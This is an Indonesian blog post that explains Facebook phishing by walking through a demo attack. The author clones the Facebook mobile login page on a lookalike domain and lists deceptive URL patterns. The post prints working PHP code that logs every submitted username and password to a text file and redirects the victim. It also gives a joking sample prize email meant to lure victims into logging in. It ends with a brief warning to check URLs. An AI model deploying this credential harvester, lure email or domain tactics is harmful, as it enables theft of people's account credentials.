Facebook Phising - Apa itu phising? Apakah phising sangat berbahaya? Bagaimana cara hacker menggunakan phising?
Bagaimana Cara membuat Phising?Oke, saya mulai dari
Apa itu Phising?Phising adalah suatu tindakan mencuri data yang sensitif, seperti data email, password, bahkan data-data kartu kredit dengan memakai web yang nyaris mirip dengan web aslinya!Sebagai demo,saya telah membuat
contoh web phising facebook(mobile site)!
Langsung ke TKP gan!
diansunday-pesbuk.com.nuWeb tersebut sangat mirip dengan aslinya kan?
Biasanya hacker sangat pintar memilih URL yang agak mirip, supaya korban tidak mencurigai link tersebut! Contoh:
facebook.com.nu/login ,
id-facebook.com.nu/home.php dan masih banyak contoh lainnya!
Sengaja saya pakai alamat
diansunday-pesbuk supaya tidak ada yang tertipu! Web phising yang telah saya buat memakai Source Code Facebook mobile! Akan tetapi didalam
Form loginnya telah saya edit ke dalam file saya yang lain, yaitu file
/cuma-contoh-diansunday-saja.php!
Sedangkan
Form Facebook yang asli seperti ini!yang berbeda hanya aksi terhadap file yang mana!
File
/cuma-contoh-diansunday-saja.php bertugas untuk mencatat data login yang telah disubmit dalam form phising, data tersebut disimpan di
password.txt!
<?php
header ('Location: http://diansunday.blogspot.com ');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "===============\r\n");
fclose($handle);
exit;
?>
Cara pertama yang paling banyak dilakukan oleh hacker untuk menjebak korban adalah mengirim link lewat email dan menawarkan hadiah-hadiah yang cukup menggiurkan! Dia akan sedikit memaksa Anda melakukan login akun facebook di web jebakan tadi yang telah dipasangi
Fake Login (Login Tipuan)!
Contoh email dari saya untuk mengajak korban ke web phising yang telah saya buat!!
Selamat!!!
Akun Pesbuk Anda terpilih menjadi Pemenang dalam program Nama Pesbuk Ter-ALAY Sejagat Raya !!
Anda berhak mendapatkan hadiah menarik (menarik bus,truk dan kapal terbang ) + 1kupon menginap selama 3hari 3malam di kandang Harimau (saya yakin tidak akan ada mau dengan hadiah ini )!!!
Segera login ke akun pesbuk Anda untuk melakukan konfirmasi, klik disini dan login dengan akun Pesbuk Anda!
Salam
Panitia Pemakaman!!
Wkwkwkwk
Dalam mengirim email, memang harus sangat meyakinkan si korban!tapi itu semua memang tergantung tingkat
Gombalisasi hacker masing-masing!
Ok, silahkan Anda coba Login di web saya yang td (
WARNING : JANGAN PAKAI DATA ASLI ) ! coba Anda masukan di kotak
amal username dengan kata bebas, contoh :
AkuOrangGanteng atau apapun terserah! Begitupun dengan kotak
amal passwordnya dengan kata apa saja! Setelah menekan tombol
Login dan Anda akan memasuki blog ini lagi!
Setelah itu semua , masuk ke file
password.phpnya di link
diansunday-pesbuk.com.nu/password.php maka apa yang Anda ketik di kotak login tadi akan muncul di file password.txt!
Ok,sekian dari saya! Hati-hati dengan Phising web seperti ini,
Anda Termasuk Orang yang Sangat Ketinggalan Zaman Jika Akun Anda diHack dengan Tehnik ini! Kenali URL dengan secermat-cermatnya sebelum men-submit data-data penting Anda di web manapun!
UPDATE!Demi kenyamanan pengunjung, saya samarkan file passwordnya supaya mudah memfilter input text, dikarenakan banyak yang memasukan kata-kata fulgar, jorok, kasar dan lain-lain !trims